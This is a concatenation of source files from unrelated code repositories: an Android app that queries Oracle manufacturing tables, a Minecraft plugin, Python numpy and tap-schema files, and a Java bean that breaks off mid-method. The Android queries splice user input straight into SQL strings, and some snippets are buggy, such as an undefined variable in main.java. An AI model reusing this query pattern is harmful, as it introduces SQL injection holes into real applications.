            Log.e("jobType :", mQuery);
            System.out.println(" " + theResultSet + " ");
            ver = true;
        } catch (SQLException e) {
            e.printStackTrace();
            ver = false;
        }
        return ver;
    }

    /** @return true when the code exists as an item (SEGMENT1) in mtl_system_items_b. */
    public boolean isAnyMsib(String item) {
        Integer ver = 0;
        ResultSet theResultSet;
        try {
            Statement statement = mConn.createStatement();
            String mQuery = "SELECT count(DISTINCT msib.SEGMENT1)\n" +
                    "FROM mtl_system_items_b msib\n" +
                    "WHERE msib.SEGMENT1 = '" + item + "'";
            theResultSet = statement.executeQuery(mQuery);
            Log.e("isAnyMsib :", mQuery);
            System.out.println(" " + theResultSet + " ");
            if (theResultSet.next()) {
                ver = Integer.parseInt(theResultSet.getString(1));
            }
        } catch (SQLException e) {
            e.printStackTrace();
        }
        if (ver > 0) {
            return true;
        } else {
            return false;
        }
    }

    /** @return true when the item has serial numbers registered in mtl_serial_numbers. */
    public boolean isSerial(String item) {
        Integer ver = 0;
        ResultSet theResultSet;
        try {
            Statement statement = mConn.createStatement();
            String mQuery = "select count(*)\n" +
                    "from\n" +
                    "mtl_system_items_b msib\n" +
                    ",mtl_serial_numbers msn\n" +
                    "where\n" +
                    "msib.inventory_item_id = msn.INVENTORY_ITEM_ID\n" +
                    "and msib.SEGMENT1 = '"+item+"'";
            theResultSet = statement.executeQuery(mQuery);
            Log.e("isAnySerial :", mQuery);
            System.out.println(" " + theResultSet + " ");
            if (theResultSet.next()) {
                ver = Integer.parseInt(theResultSet.getString(1));
            }
        } catch (SQLException e) {
            e.printStackTrace();
        }
        if (ver > 0) {
            return true;
        } else {
            return false;
        }
    }

    /**
     * Finds the earliest released (status_type = 3) job building the given
     * inventory item id; returns "0" (via NVL) when none exists.
     */
    public String getJobByItemId(String item_id) {
        String data = "";
        Connection dbConnection = null;
        Statement statement = null;
        ResultSet theResultSet;
        dbConnection = mConn;
        try {
            statement = dbConnection.createStatement();
            mQuery = "SELECT NVL(min(we.wip_entity_name), 0) \n" +
                    " FROM wip_entities we,\n" +
                    " wip_discrete_jobs wdj,\n" +
                    " wip_operations wo,\n" +
                    " mtl_system_items_b msib\n" +
                    " WHERE we.primary_item_id = msib.inventory_item_id\n" +
                    " AND we.wip_entity_id = wdj.wip_entity_id\n" +
                    " AND wo.wip_entity_id = wdj.wip_entity_id\n" +
                    " AND msib.organization_id = we.organization_id\n" +
                    " AND wdj.status_type = 3\n" +
                    " and msib.INVENTORY_ITEM_ID = '" + item_id + "'\n" +
                    " ORDER BY wdj.scheduled_start_date";
            Log.e("getJob ItemId", mQuery);
            ResultSet result = statement.executeQuery(mQuery);
            if (result.next()) {
                data = result.getString(1);
            }
        } catch (SQLException e) {
            e.printStackTrace();
        }
        return data;
    }

    /**
     * Validates a job name: returns it back when it is a released job,
     * otherwise "0" (via NVL).
     */
    public String cekJob(String code) {
        String data = "";
        Connection dbConnection = null;
        Statement statement = null;
        ResultSet theResultSet;
        dbConnection = mConn;
        try {
            statement = dbConnection.createStatement();
            mQuery = "SELECT NVL(min(we.wip_entity_name), 0) \n" +
                    " FROM wip_entities we,\n" +
                    " wip_discrete_jobs wdj,\n" +
                    " wip_operations wo,\n" +
                    " mtl_system_items_b msib\n" +
                    " WHERE we.primary_item_id = msib.inventory_item_id\n" +
                    " AND we.wip_entity_id = wdj.wip_entity_id\n" +
                    " AND wo.wip_entity_id = wdj.wip_entity_id\n" +
                    " AND msib.organization_id = we.organization_id\n" +
                    " AND wdj.status_type = 3\n" +
                    " and we.wip_entity_name = '" + code + "'\n" +
                    " ORDER BY wdj.scheduled_start_date";
            Log.e("getJob ItemId", mQuery);
            ResultSet result = statement.executeQuery(mQuery);
            if (result.next()) {
                data = result.getString(1);
            }
        } catch (SQLException e) {
            e.printStackTrace();
        }
        return data;
    }

    /** Resolves an item code (SEGMENT1) to its INVENTORY_ITEM_ID, or "" when unknown. */
    public String getInvItemId(String code) {
        String data = "";
        Connection dbConnection = null;
        Statement statement = null;
        ResultSet theResultSet;
        dbConnection = mConn;
        try {
            statement = dbConnection.createStatement();
            mQuery = "SELECT DISTINCT msib.INVENTORY_ITEM_ID \n" +
                    "FROM mtl_system_items_b msib\n" +
                    "WHERE msib.SEGMENT1 = '" + code + "'";
            Log.e("get ItemId", mQuery);
            ResultSet result = statement.executeQuery(mQuery);
            if (result.next()) {
                data = result.getString(1);
            }
        } catch (SQLException e) {
            e.printStackTrace();
        }
        return data;
    }

    /**
     * @return true when the job already has an unprocessed row
     *         (PROCESS_FLAG = 1) in mtl_transactions_interface, i.e. a
     *         completion is still being processed for it.
     */
    boolean isProcessed(String jobId) {
        try {
            Statement statement = mConn.createStatement();
            mQuery = "SELECT * FROM mtl_transactions_interface \n" +
                    "WHERE TRANSACTION_SOURCE_ID = " + jobId + " \n" +
                    "AND PROCESS_FLAG=1";
            ResultSet result = statement.executeQuery(mQuery);
            Log.d("isProcessed", mQuery);
            if (result.next()) {
                return true;
            } else {
                return false;
            }
        } catch (SQLException e) {
            e.printStackTrace();
        }
        return false;
    }

    /** Resolves a job name to its wip_entity_id at the last operation sequence, or "". */
    String getJobId(String code){
        try{
            Statement statement = mConn.createStatement();
            mQuery = "SELECT we.wip_entity_name, we.wip_entity_id\n" +
                    " FROM wip_entities we,\n" +
                    " wip_discrete_jobs wdj,\n" +
                    " wip_operations wo,\n" +
                    " mtl_system_items_b msib\n" +
                    " WHERE we.primary_item_id = msib.inventory_item_id\n" +
                    " AND we.wip_entity_id = wdj.wip_entity_id\n" +
                    " AND wo.wip_entity_id = wdj.wip_entity_id\n" +
                    " AND msib.organization_id = we.organization_id\n" +
                    " AND we.WIP_ENTITY_NAME = '"+code+"'\n" +
                    " AND wo.operation_seq_num = \n" +
                    " (SELECT max(wo2.OPERATION_SEQ_NUM) FROM WIP_OPERATIONS wo2\n" +
                    " WHERE wo2.WIP_ENTITY_ID = we.WIP_ENTITY_ID)\n" +
                    " AND wdj.status_type in (3,4)\n" +
                    " ORDER BY wdj.scheduled_completion_date";
            Log.d("getjobid : ",mQuery);
            ResultSet result = statement.executeQuery(mQuery);
            if (result.next()){
                String jobId = result.getString(2);
                return jobId;
            }
        }catch (SQLException e){
            e.printStackTrace();
        }
        return "";
    }

    /**
     * Queries the job's header data (schedule, quantities, item) at its last
     * operation and binds the result set to the RecyclerView.
     *
     * @param state true when the job already has a pending completion
     *              (passed through to the adapter to lock the row)
     */
    void createRecyclerView(String code, Boolean state) {
        Log.d("Conn", "." + mConn);
        if (mConn == null) {
            Toast.makeText(this, "No Connection", Toast.LENGTH_SHORT).show();
            return;
        }
        try {
            // Scroll-insensitive result set because the adapter walks it by position.
            Statement statement = mConn.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
                    ResultSet.CONCUR_READ_ONLY);
            mQuery = "SELECT we.wip_entity_name, TO_CHAR(wdj.scheduled_completion_date,'dd MON YYYY HH24:mi'), \n" +
                    "nvl(wo.QUANTITY_WAITING_TO_MOVE,0), wdj.QUANTITY_COMPLETED, wo.QUANTITY_WAITING_TO_MOVE available,\n" +
                    "CASE WHEN wdj.scheduled_completion_date < SYSDATE THEN 0\n" +
                    "ELSE 1 END status, we.wip_entity_id, msib.SEGMENT1 , msib.DESCRIPTION \n" +
                    "FROM wip_entities we,\n" +
                    "wip_discrete_jobs wdj,\n" +
                    "wip_operations wo,\n" +
                    "mtl_system_items_b msib\n" +
                    "WHERE we.primary_item_id = msib.inventory_item_id\n" +
                    "AND we.wip_entity_id = wdj.wip_entity_id\n" +
                    "AND wo.wip_entity_id = wdj.wip_entity_id\n" +
                    "AND msib.organization_id = we.organization_id\n" +
                    "AND we.WIP_ENTITY_NAME = '" + code + "'\n" +
                    "AND wo.operation_seq_num = \n" +
                    "(SELECT max(wo2.OPERATION_SEQ_NUM) FROM WIP_OPERATIONS wo2\n" +
                    "WHERE wo2.WIP_ENTITY_ID = we.WIP_ENTITY_ID)\n" +
                    "AND wdj.status_type in (3,4)\n" +
                    "ORDER BY wdj.scheduled_completion_date";
            Log.d("QUERY", mQuery);
            ResultSet result = statement.executeQuery(mQuery);
            if (result.next()) {
                layoutManager = new LinearLayoutManager(getApplicationContext());
                adapter = new RecyclerCompletion(getApplicationContext(), result, this, state);
                rv_job.setLayoutManager(layoutManager);
                rv_job.hasFixedSize();
                rv_job.setAdapter(adapter);
            } else {
                Snackbar.make(getWindow().getDecorView().getRootView(), "Data tidak tersedia", Snackbar.LENGTH_LONG)
                        .show();
            }
        } catch (SQLException e) {
            e.printStackTrace();
        }
    }

    /**
     * Row click from the adapter: validates the job can be completed and
     * launches the (serial or non-serial) completion screen.
     */
    @Override
    public void OnItemClick(String jobName, String jobId, String item, String qtyAvail, String qtyComplete) {
        if(isProcessed(jobId)){
            dialogProcces();
        }else {
            int complete = Integer.parseInt(qtyComplete); // parsed but currently unused
            int move = Integer.parseInt(qtyAvail);
            if (move==0){
                dialogQty();
            }else {
                if(isSerial(item)){
                    // Serial-controlled items need the serial from a body-card scan.
                    if(serial.length()==0){
                        Snackbar.make(getWindow().getDecorView().getRootView(), "Item serial, silahkan ulang scan/input dengan kartu body", Snackbar.LENGTH_LONG)
                                .show();
                    } else {
                        Intent i = new Intent(this, ProcessSerialActivity.class);
                        i.putExtra("jobName",jobName);
                        i.putExtra("qtyAvail",qtyAvail);
                        i.putExtra("serial",translateSerial(getInvItemId(item), serial));
                        startActivity(i);
                    }
                } else {
                    Intent i = new Intent(this, ProcessActivity.class);
                    i.putExtra("jobName",jobName);
                    i.putExtra("qtyAvail",qtyAvail);
                    startActivity(i);
                }
            }
        }
    }

    /** Informs the user the job already has a completion in progress. */
    void dialogProcces(){
        new MaterialAlertDialogBuilder(this)
                .setTitle("Alert!")
                .setMessage("Job ini sedang diproses!")
                .setPositiveButton("OK", new DialogInterface.OnClickListener() {
                    @Override
                    public void onClick(DialogInterface dialog, int which) {
                        dialog.cancel();
                    }
                }).show();
    }

    /** Informs the user there is no quantity available to complete. */
    void dialogQty(){
        new MaterialAlertDialogBuilder(this)
                .setTitle("Alert!")
                .setMessage("Tidak ada qty yang bisa dicompletion!")
                .setPositiveButton("OK", new DialogInterface.OnClickListener() {
                    @Override
                    public void onClick(DialogInterface dialog, int which) {
                        dialog.cancel();
                    }
                }).show();
    }

    /** Confirmation dialog before leaving this screen for the main menu. */
    public void backMenu() {
        new MaterialAlertDialogBuilder(CompletionActivity.this)
                .setIcon(R.drawable.ic_warning)
                .setTitle("Perhatian!")
                .setMessage("Anda yakin ingin kembali ke menu? ")
                .setPositiveButton("Ya", new DialogInterface.OnClickListener() {
                    @Override
                    public void onClick(DialogInterface dialog, int which) {
                        Intent intent = new Intent(getApplicationContext(), MenuActivity.class);
                        intent.setFlags(Intent.FLAG_ACTIVITY_NO_HISTORY);
                        intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TOP);
                        intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
                        startActivity(intent);
                        finish();
                    }
                })
                .setNegativeButton("Tidak", null)
                .create().show();
    }

    @Override
    public void onBackPressed() {
        backMenu();
    }
}
| b164fa7455cab44a3419c7cf018f9e90f867004b | [
"Java",
"Gradle"
] | 7 | Gradle | godelivdiva/Quickdroid-CompletionASSY-GT | 8051d726f56aeb13ad7d732508c41e1cdc782689 | 39b87d8e0a6da3efdcf9bb08748bfb4d02cf7cb7 |
refs/heads/master | <repo_name>Jon-M-G/RandomizerPluginProject<file_sep>/src/pg/Pot4toLord/RandomCrafter.java
package pg.Pot4toLord;
import org.bukkit.Material;
import org.bukkit.block.EnchantingTable;
import org.bukkit.event.inventory.*;
import org.bukkit.inventory.EnchantingInventory;
import org.bukkit.inventory.ItemStack;
import org.bukkit.Bukkit;
import org.bukkit.ChatColor;
import org.bukkit.entity.Player;
import org.bukkit.event.EventHandler;
import org.bukkit.event.Listener;
import org.bukkit.event.entity.EntityDeathEvent;
import org.bukkit.event.player.PlayerJoinEvent;
import org.bukkit.inventory.meta.ItemMeta;
import org.bukkit.plugin.java.JavaPlugin;
import java.util.List;
import java.util.Random;
public class RandomCrafter extends JavaPlugin implements Listener{
@Override
public void onEnable(){
Bukkit.getServer().getConsoleSender().sendMessage(ChatColor.GREEN + "RandomizerCrafter has been successfully loaded.");
//get the config info to chose random items
getConfig().options().copyDefaults(true);
saveConfig();
//register sever events
this.getServer().getPluginManager().registerEvents(this,this);
}
@EventHandler
public void onMobDeath(EntityDeathEvent event){
event.setDroppedExp(30);
event.getEntity().getWorld().dropItemNaturally(event.getEntity().getLocation(), getRandomItem(null));
Bukkit.getServer().getConsoleSender().sendMessage(ChatColor.RED + "Mob has been Slain");
event.getDrops().clear();
}
@EventHandler
public void onJoin(PlayerJoinEvent event){
Player player = event.getPlayer();
player.getInventory().addItem(getRandomItem(null));
}
private int getRandomTier(){
int tier;
double chance = new Random().nextDouble()*100;
if (chance<=1){
if (chance<=.5){
tier = 3;
}
else
tier = 2;
}
else
tier = 1;
return tier;
}
private ItemStack getRandomItem(ItemStack expectedItem){
//grab a random item from the list of items
String TierString = "Tier" + getRandomTier() + "_Items";
String TestList = "Small_List";
List<String> RandomItemList = this.getConfig().getStringList(TierString);
Bukkit.getServer().getConsoleSender().sendMessage(ChatColor.RED + (RandomItemList.size()+"") +'\n');
int index = new Random().nextInt(RandomItemList.size());
String items = RandomItemList.get(index);
Bukkit.getServer().getConsoleSender().sendMessage(ChatColor.RED + (items+"") );
ItemStack newItem = expectedItem; //set this as expected item for if matchMaterial() comes back as null
//try catch to test if the code being tried through matchMaterial is a legacy code or just invalid.
try{
newItem = new ItemStack(Material.matchMaterial(items.toUpperCase()));
} //rename the intended crafted item to the name of the faulty legacy code for easy identifying broken codes
catch(IllegalArgumentException ex){
//rename the item to the name of broken minecraft item codes
ItemMeta meta = newItem.getItemMeta();
Bukkit.getServer().getConsoleSender().sendMessage(ChatColor.RED + expectedItem.getItemMeta().getDisplayName() );
meta.setDisplayName(items);
newItem.setItemMeta(meta);
}
return newItem;
}
@EventHandler
public void onInventoryClick(InventoryClickEvent event){
if(event.getInventory().getType() != InventoryType.ANVIL && event.getInventory().getType() != InventoryType.GRINDSTONE){
Bukkit.getServer().getConsoleSender().sendMessage(ChatColor.YELLOW + "ANVIL" );
if(event.getSlotType() == InventoryType.SlotType.RESULT && event.getCurrentItem()!= null ) {
try {
Bukkit.getServer().getConsoleSender().sendMessage(ChatColor.YELLOW + event.getCurrentItem().getItemMeta().getDisplayName());
ItemStack expectedItem = event.getCurrentItem();
event.setCurrentItem(getRandomItem(expectedItem));
} catch (NullPointerException ex) {
Bukkit.getServer().getConsoleSender().sendMessage(ChatColor.YELLOW + "Empty Crafting Slot Click detected");
}
}
}
}
}
| e15479ab8d588ba0550904b8d6c3b3e51c7fdc1d | [
"Java"
] | 1 | Java | Jon-M-G/RandomizerPluginProject | 1f4b9fd2420f3ebc246f346918a554df85188325 | 29f6b3eacfd0200febe9fbb4a807698c4f4a7b99 |
refs/heads/master | <repo_name>jovanidesouza/prog1<file_sep>/main.java
class main{
public static void main(String args[]){
retangulo r;
r=new retangulo();
r1.width=10;
r1.height=11;
System.out.println(r.area());
System.out.println(r.perimetro());
}
} | d915c9eaf143e1df5d9b6390304f34f9f3b7ee7e | [
"Java"
] | 1 | Java | jovanidesouza/prog1 | eb703d5cbeb191f5f67b8dc504f16ff0de9fcbb7 | ba07f3d4bdb8d391c4762a40a9367b0c1da60a2f |
refs/heads/master | <repo_name>mohanakrishnavh/Deep-Learning-Specialization<file_sep>/Neural Networks & Deep Learning/Week4/Programming Assignments/nn_model.py
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 27 16:16:51 2018
@author: Mohanakrishna
"""
<file_sep>/Neural Networks & Deep Learning/Week2/Vectorization/VectorizationDemo.py
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 20 11:33:22 2018
@author: Mohanakrishna
"""
import time
import numpy as np
#Numpy array
a = np.array([1,2,3,4])
print(a)
#Vectorized version
a = np.random.rand(10000000)
b = np.random.rand(10000000)
tic = time.time()
c = np.dot(a,b)
toc = time.time()
print("Vectorized version: "+str(toc-tic)+" ms")
#Non-vectorized Version
c=0
tic = time.time()
for i in range(10000000):
c+=a[i]*b[i]
toc = time.time()
print("Non-Vectorized(\"for\" loop) version: "+str(toc-tic)+" ms")
<file_sep>/Neural Networks & Deep Learning/Week2/Vectorization/NumpyVectors.py
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 20 19:34:37 2018
@author: Mohanakrishna
"""
import numpy as np
print("Inconsistent Implementation")
a = np.random.randn(5)
print(a)
print(a.shape) #rank1 array - neither a row nor column vector
print(a.T)
print(np.dot(a,a.T))
#Correct way of defining the random vector - avoiding rank1 vector
print("Consistent Implementation")
a = np.random.rand(5,1)
print(a)
print(a.T)
print(a,a.T)
'''
If unsure of the shape throw an assert statement
assert(a.shape ==(5,1)) - Inexpensive check
If you still end up with rank1 array, it can be reshaped
a = a.reshape((5,1))
'''
<file_sep>/Neural Networks & Deep Learning/Week2/Vectorization/VectorizationExamples.py
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 20 11:48:36 2018
@author: Mohanakrishna
"""
import numpy as np
v = [1,2,3,4]
u = np.exp(v)
print(u)
#Try the below:
#np.log(v)
#np.abs(v)
#np.maximum(v,0)
#v**2
#1/v<file_sep>/Neural Networks & Deep Learning/Week2/Vectorization/BroadcastingDemo.py
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 20 12:27:33 2018
@author: Mohanakrishna
"""
import numpy as np
A = np.array([[56.0,0.0,4.4,68.0],
[1.2,104.0,52.0,8.0],
[1.8,135.0,99.0,0.9]])
print(A)
cal = A.sum(axis=0)
print(cal)
percentage = 100*A/cal.reshape(1,4) #advised to reshape to resulting shape
print(percentage) | b0b8cc4dbad6b65a5f3c8c448f4b0635ba94ac1c | [
"Python"
] | 5 | Python | mohanakrishnavh/Deep-Learning-Specialization | 4af2d47bfa5ff6f5f5e784f46769640a213bb179 | ff3152d6a563bbd61d5ecaf081e9336a153ef0bd |
refs/heads/main | <file_sep># DatePickerInSwiftUI

<file_sep>//
// ContentView.swift
// DatePickerInSwiftUI
//
// Created by <NAME> on 24.06.2020.
//
import SwiftUI
struct ContentView: View {
@State private var selectedDate = Date()
var body: some View {
VStack {
Spacer()
Text("\(selectedDate)")
Spacer()
VStack {
DatePicker("Select date", selection: $selectedDate)
.padding()
}.padding()
}.padding()
}
}
struct ContentView_Previews: PreviewProvider {
static var previews: some View {
ContentView()
}
}
<file_sep>//
// DatePickerInSwiftUIApp.swift
// DatePickerInSwiftUI
//
// Created by <NAME> on 24.06.2020.
//
import SwiftUI
@main
struct DatePickerInSwiftUIApp: App {
var body: some Scene {
WindowGroup {
ContentView()
}
}
}
| 4520610247fe720ed8bdb9b71ab6a1c46d298968 | [
"Markdown",
"Swift"
] | 3 | Markdown | ram4ik/DatePickerInSwiftUI | 0c929a1f8f2c265bc1bda6de69a8a740316d66b1 | 7ed22bdfbbb54cbea2b9460f7620da5fbf1af01b |
refs/heads/master | <repo_name>isabella232/tap-greenhouse<file_sep>/tap_greenhouse/streams/scheduled_interviews.py
from tap_kit.streams import Stream
class ScheduledInterview(Stream):
    """Singer stream for Greenhouse Harvest scheduled interviews.

    Records are keyed by ``id`` and replicated incrementally on
    ``updated_at``.
    """

    stream = "scheduled_interviews"

    # Replication bookkeeping consumed by the tap framework.
    meta_fields = dict(
        key_properties=['id'],
        replication_key='updated_at',
        valid_replication_keys=['updated_at'],
        incremental_search_key='updated_at',
        replication_method='incremental',
        selected_by_default=True
    )

    # JSON schema of one scheduled-interview record as emitted by this stream.
    schema = {
        "type": ["null", "object"],
        "properties": {
            "id": {
                "type": ["null", "integer"]
            },
            "application_id": {
                "type": ["null", "integer"]
            },
            "external_event_id": {
                "type": ["null", "string"]
            },
            # Interview start/end are nested objects holding a single
            # ISO-8601 "date_time" field.
            "start": {
                "type": ["null", "object"],
                "properties": {
                    "date_time": {
                        "type": ["null", "string"],
                        "format": "date-time"
                    }
                }
            },
            "end": {
                "type": ["null", "object"],
                "properties": {
                    "date_time": {
                        "type": ["null", "string"],
                        "format": "date-time"
                    }
                }
            },
            "location": {
                "type": ["null", "string"]
            },
            "video_conferencing_url": {
                "type": ["null", "string"]
            },
            "status": {
                "type": ["null", "string"]
            },
            "created_at": {
                "type": ["null", "string"],
                "format": "date-time"
            },
            "updated_at": {
                "type": ["null", "string"],
                "format": "date-time"
            },
            "interview": {
                "type": ["null", "object"],
                "properties": {
                    "id": {
                        "type": ["null", "integer"]
                    },
                    "name": {
                        "type": ["null", "string"]
                    }
                }
            },
            "organizer": {
                "type": ["null", "object"],
                "properties": {
                    "id": {"type": ["null", "integer"]},
                    "first_name": {"type": ["null", "string"]},
                    "last_name": {"type": ["null", "string"]},
                    "name": {"type": ["null", "string"]},
                    "employee_id": {"type": ["null", "string"]},
                }
            },
            "interviewers": {
                "type": ["null", "array"],
                "items": {
                    "type": ["null", "object"],
                    "properties": {
                        "id": {"type": ["null", "integer"]},
                        "employee_id": {"type": ["null", "string"]},
                        "name": {"type": ["null", "string"]},
                        "email": {"type": ["null", "string"]},
                        "response_status": {"type": ["null", "string"]},
                        "scorecard_id": {"type": ["null", "integer"]},
                    }
                }
            }
        }
    }
}<file_sep>/tap_greenhouse/streams/scorecards.py
from tap_kit.streams import Stream
class Scorecards(Stream):
    """Singer stream for Greenhouse Harvest interview scorecards.

    Records are keyed by ``id`` and replicated incrementally on
    ``updated_at``.
    """

    stream = "scorecards"

    # Replication bookkeeping consumed by the tap framework.
    meta_fields = dict(
        key_properties=['id'],
        replication_key='updated_at',
        valid_replication_keys=['updated_at'],
        incremental_search_key='updated_at',
        replication_method='incremental',
        selected_by_default=True
    )

    # JSON schema of one scorecard record as emitted by this stream.
    schema = {
        "type": ["null", "object"],
        "properties": {
            "id": {
                "type": ["null", "integer"]
            },
            "updated_at": {
                "type": ["null", "string"]
            },
            "created_at": {
                "type": ["null", "string"]
            },
            "interview": {
                "type": ["null", "string"]
            },
            "interview_step": {
                "type": "object",
                "properties": {
                    "id": {
                        "type": ["null", "integer"]
                    },
                    "name": {
                        "type": ["null", "string"]
                    }
                }
            },
            "candidate_id": {
                "type": ["null", "integer"]
            },
            "application_id": {
                "type": ["null", "integer"]
            },
            "interviewed_at": {
                "type": ["null", "string"],
                "format": "date-time"
            },
            # Person who filed the scorecard.
            "submitted_by": {
                "type": "object",
                "properties": {
                    "id": {
                        "type": ["null", "integer"]
                    },
                    "first_name": {
                        "type": ["null", "string"]
                    },
                    "last_name": {
                        "type": ["null", "string"]
                    },
                    "name": {
                        "type": ["null", "string"]
                    },
                    "employee_id": {
                        "type": ["null", "string"]
                    }
                }
            },
            # Person who conducted the interview (may differ from submitter).
            "interviewer": {
                "type": "object",
                "properties": {
                    "id": {
                        "type": ["null", "integer"]
                    },
                    "first_name": {
                        "type": ["null", "string"]
                    },
                    "last_name": {
                        "type": ["null", "string"]
                    },
                    "name": {
                        "type": ["null", "string"]
                    },
                    "employee_id": {
                        "type": ["null", "string"]
                    }
                },
            },
            "submitted_at": {
                "type": ["null", "string"],
                "format": "date-time"
            },
            "overall_recommendation": {
                "type": ["null", "string"]
            },
            # Per-attribute ratings with free-text notes.
            "attributes": {
                "type": "array",
                "items":
                    {
                        "type": "object",
                        "properties": {
                            "name": {
                                "type": ["null", "string"]
                            },
                            "type": {
                                "type": ["null", "string"]
                            },
                            "note": {
                                "type": ["null", "string"]
                            },
                            "rating": {
                                "type": ["null", "string"]
                            }
                        }
                    }
            },
            # Attribute names bucketed by the rating they received.
            "ratings": {
                "type": "object",
                "properties": {
                    "definitely_not": {
                        "type": "array",
                        "items":
                            {
                                "type": ["null", "string"]
                            }
                    },
                    "no": {
                        "type": "array",
                        "items":
                            {
                                "type": ["null", "string"]
                            }
                    },
                    "mixed": {
                        "type": "array",
                        "items":
                            {
                                "type": ["null", "string"]
                            }
                    },
                    "yes": {
                        "type": "array",
                        "items":
                            {
                                "type": ["null", "string"]
                            }
                    },
                    "strong_yes": {
                        "type": "array",
                        "items": {
                            "type": ["null", "string"]
                        }
                    }
                }
            },
            # Custom interview questions and their answers.
            "questions": {
                "type": "array",
                "items":
                    {
                        "type": "object",
                        "properties": {
                            "id": {
                                "type": ["null", "integer"]
                            },
                            "question": {
                                "type": ["null", "string"]
                            },
                            "answer": {
                                "type": ["null", "string"]
                            }
                        }
                    }
            }
        }
    }
| cc059bd8b8f08d4bcf0387267a8089b22f704df4 | [
"Python"
] | 2 | Python | isabella232/tap-greenhouse | 53b93038e23dae4458361367f9e9fddd26c692f5 | 263cae6c8c40e7d24ce737a19915cce9de4e64b5 |
refs/heads/master | <repo_name>ly774508966/StreamBox<file_sep>/app/src/main/java/io/playcode/streambox/data/bean/PandaStreamEntity.java
package io.playcode.streambox.data.bean;
/**
* Created by anpoz on 2017/4/14.
*/
public class PandaStreamEntity {
/**
* errno : 0
* errmsg :
* data : {"hostinfo":{"rid":"29544914","name":"小马AAAAAA","avatar":"http://i9.pdim.gs/fab3da6d679bbd75c45a92639a6ffa9a.jpeg","bamboos":"8931979"},"roominfo":{"id":"16688","name":"今天提前溜。要去LSPL现场助阵!","classification":"英雄联盟","cate":"lol","bulletin":"直播时间12点-6点 有时候加班!\n ","person_num":"230072","fans":"0","pictures":{"img":"http://i5.pdim.gs/90/f1428c8c77436b26a808c7ff4989f6c3/w338/h190.jpg"},"display_type":"1","start_time":"1492142299","end_time":"1492080996","room_type":"1","status":"2"},"videoinfo":{"address":"http://pl-hls3.live.panda.tv/live_panda/7d9bdfd8beca4be796bc4b757503decd_small.m3u8","watermark":"1"}}
* authseq :
*/
private String errno;
private String errmsg;
private DataEntity data;
private String authseq;
public String getErrno() {
return errno;
}
public void setErrno(String errno) {
this.errno = errno;
}
public String getErrmsg() {
return errmsg;
}
public void setErrmsg(String errmsg) {
this.errmsg = errmsg;
}
public DataEntity getData() {
return data;
}
public void setData(DataEntity data) {
this.data = data;
}
public String getAuthseq() {
return authseq;
}
public void setAuthseq(String authseq) {
this.authseq = authseq;
}
public static class DataEntity {
/**
* hostinfo : {"rid":"29544914","name":"小马AAAAAA","avatar":"http://i9.pdim.gs/fab3da6d679bbd75c45a92639a6ffa9a.jpeg","bamboos":"8931979"}
* roominfo : {"id":"16688","name":"今天提前溜。要去LSPL现场助阵!","classification":"英雄联盟","cate":"lol","bulletin":"直播时间12点-6点 有时候加班!\n ","person_num":"230072","fans":"0","pictures":{"img":"http://i5.pdim.gs/90/f1428c8c77436b26a808c7ff4989f6c3/w338/h190.jpg"},"display_type":"1","start_time":"1492142299","end_time":"1492080996","room_type":"1","status":"2"}
* videoinfo : {"address":"http://pl-hls3.live.panda.tv/live_panda/7d9bdfd8beca4be796bc4b757503decd_small.m3u8","watermark":"1"}
*/
private HostinfoEntity hostinfo;
private RoominfoEntity roominfo;
private VideoinfoEntity videoinfo;
public HostinfoEntity getHostinfo() {
return hostinfo;
}
public void setHostinfo(HostinfoEntity hostinfo) {
this.hostinfo = hostinfo;
}
public RoominfoEntity getRoominfo() {
return roominfo;
}
public void setRoominfo(RoominfoEntity roominfo) {
this.roominfo = roominfo;
}
public VideoinfoEntity getVideoinfo() {
return videoinfo;
}
public void setVideoinfo(VideoinfoEntity videoinfo) {
this.videoinfo = videoinfo;
}
public static class HostinfoEntity {
/**
* rid : 29544914
* name : 小马AAAAAA
* avatar : http://i9.pdim.gs/fab3da6d679bbd75c45a92639a6ffa9a.jpeg
* bamboos : 8931979
*/
private String rid;
private String name;
private String avatar;
private String bamboos;
public String getRid() {
return rid;
}
public void setRid(String rid) {
this.rid = rid;
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public String getAvatar() {
return avatar;
}
public void setAvatar(String avatar) {
this.avatar = avatar;
}
public String getBamboos() {
return bamboos;
}
public void setBamboos(String bamboos) {
this.bamboos = bamboos;
}
}
/**
 * Room section of the room response: title, category, viewer/fan counters,
 * cover picture and start/end timestamps. Numeric-looking values (counts,
 * epoch-second timestamps) are delivered and stored as strings.
 */
public static class RoominfoEntity {
/**
 * id : 16688
 * name : 今天提前溜。要去LSPL现场助阵!
 * classification : 英雄联盟
 * cate : lol
 * bulletin : 直播时间12点-6点 有时候加班!
 * person_num : 230072
 * fans : 0
 * pictures : {"img":"http://i5.pdim.gs/90/f1428c8c77436b26a808c7ff4989f6c3/w338/h190.jpg"}
 * display_type : 1
 * start_time : 1492142299
 * end_time : 1492080996
 * room_type : 1
 * status : 2
 */
private String id; // room id
private String name; // room title
private String classification; // category display name
private String cate; // category slug (e.g. "lol")
private String bulletin; // host's announcement text
private String person_num; // current viewer count (string)
private String fans;
private PicturesEntity pictures; // room cover image wrapper
private String display_type;
private String start_time; // stream start, epoch seconds (string)
private String end_time;
private String room_type;
private String status;
public String getId() {
return id;
}
public void setId(String id) {
this.id = id;
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public String getClassification() {
return classification;
}
public void setClassification(String classification) {
this.classification = classification;
}
public String getCate() {
return cate;
}
public void setCate(String cate) {
this.cate = cate;
}
public String getBulletin() {
return bulletin;
}
public void setBulletin(String bulletin) {
this.bulletin = bulletin;
}
public String getPerson_num() {
return person_num;
}
public void setPerson_num(String person_num) {
this.person_num = person_num;
}
public String getFans() {
return fans;
}
public void setFans(String fans) {
this.fans = fans;
}
public PicturesEntity getPictures() {
return pictures;
}
public void setPictures(PicturesEntity pictures) {
this.pictures = pictures;
}
public String getDisplay_type() {
return display_type;
}
public void setDisplay_type(String display_type) {
this.display_type = display_type;
}
public String getStart_time() {
return start_time;
}
public void setStart_time(String start_time) {
this.start_time = start_time;
}
public String getEnd_time() {
return end_time;
}
public void setEnd_time(String end_time) {
